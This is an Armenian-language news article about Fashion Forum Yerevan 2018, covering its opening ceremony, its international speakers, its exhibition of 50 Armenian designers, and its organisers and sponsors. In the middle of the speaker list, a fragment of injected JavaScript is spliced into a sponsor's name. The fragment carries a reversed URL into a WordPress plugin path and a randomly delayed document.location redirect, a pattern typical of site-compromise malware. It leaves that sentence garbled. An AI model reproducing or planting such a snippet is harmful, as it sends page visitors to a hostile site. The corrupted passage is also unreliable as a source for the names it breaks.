
Հայաստանում նորաձևության՝ սպասված և ամենամեծ միջոցառումը
Հայաստանում տեղի ունեցած փոփոխությունների ալիքին զուգընթաց կազմակերպվել է նաև Նորաձևության ֆորում Երևան 2018, որն առաջին անգամ է տեղի ունեցել Հայաստանում՝ միջազգային և տեղական փորձագետների մասնակցությամբ:
Բացման հանդիսավոր արարողությունը տեղի է ունեցել հունիսի 2-ին՝ Արամ Խաչատրյանի անվան տուն-թանգարանում՝ բազմաթիվ միջազգային ինֆլուենսերների և տեղական անվանի հյուրերի մասնակցությամբ։ «Նոյի սերունդները» ցուցահանդեսի բացմանը ներկա էր նաև ՀՀ մշակույթի նախարար Լիլիթ Մակունցը: Բացմանը ողջույնի խոսքերով հանդես եկան Հայաստանում Եվրոպական Միության պատվիրակության ղեկավար, դեսպան Պյոտր Անտոնի Սվիտալսկին և Հայաստանում Գերմանիայի Դաշնային Հանրապետության դեսպան Մաթիաս Քիսլերը, ովքեր քաջալերեցին հայ դիզայներներին պահպանել ստեղծարար ոգին և շարունակել իրենց ներդրումն ի նպաստ Հայաստանի նորաձևության ոլորտի զարգացմանը:
Ֆորումը ազատ էր ոլորտում ներգրավված մասնագետների համար հունիսի 2-4-ը, որը հնարավորություն տվեց ցանկացողներին մասնակցել նորաձևության միջազգային փորձագետների դասընթացներին, սեմինարներին, քննարկումներին և ձեռք բերել նոր գիտելիքներ՝ ապահովելով նորաձևության ինտեգրման նոր հարթակ։ Նորաձևության աշխարհի հայտնի ներկայացուցիչներն էին Ադամ Քաթց Սինդինգը (հանրաճանաչ սթրիթ-սթայլ լուսանկարիչ), Գվինեթ Հոլանդը (թրենդ խորհրդատու, գրող, Վեսթմիստեր համալսարանի դասախոս), Անդրեա Բրունոն (Թուրինի համալսարանի նորաձևության և տեքստիլի բաժնի ղեկավար), Կամիլ Բոյերը և Մառլեն Ագռայթերը (Ավստրիայի նորաձևության ասոցիացիա), Կատյա Գուսեթը (ոճաբան, նորաձևության բլոգեր, ինստագրամ ինֆլյուենսեր), Մաքսիմ Գեթմանը (նորաձևության լուսանկարիչ), Անտոն Երեմենկոն (Harper’s Bazaar Ուկրաինա խմբագիր), Լուսինե Այանյանը (HAY-HAY.CO հիմնադիր, ոճաբան), Քսենիա Չերնին (ECO-AGE դեսպան, Green Stylettoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos-ի հիմնադիր)։
Ֆորումի շրջանակներում կազմակերպված ցուցահանդեսը հյուընկալում էր 50 հայ դիզայներների, ովքեր ներկայացրեցին իրենց լավագույն աշխատանքները։
Ի հավելումն, ֆորումը ցուցադրեց նաև ԹՈՒՄՈ-ի ուսանողների աշխատանքները՝ հնարավորություն ընձեռելով երիտասարդներին ցուցադրել իրենց տաղանդն ու հմտությունները:
Ֆորումի կազմակերպիչներն են՝ Հայաստանի նորաձևության և դիզայնի պալատը և Ազդեցության գործարար ակումբը: Ֆորումի աջակիցնենրն են Արմենիա Մարիոթ հյուրանոցը, ԹՈՒՄՈ ստեղծարար տեխնոլոգիաների կենտրոնը և ՀՀ Մշակույթի նախարարությունը: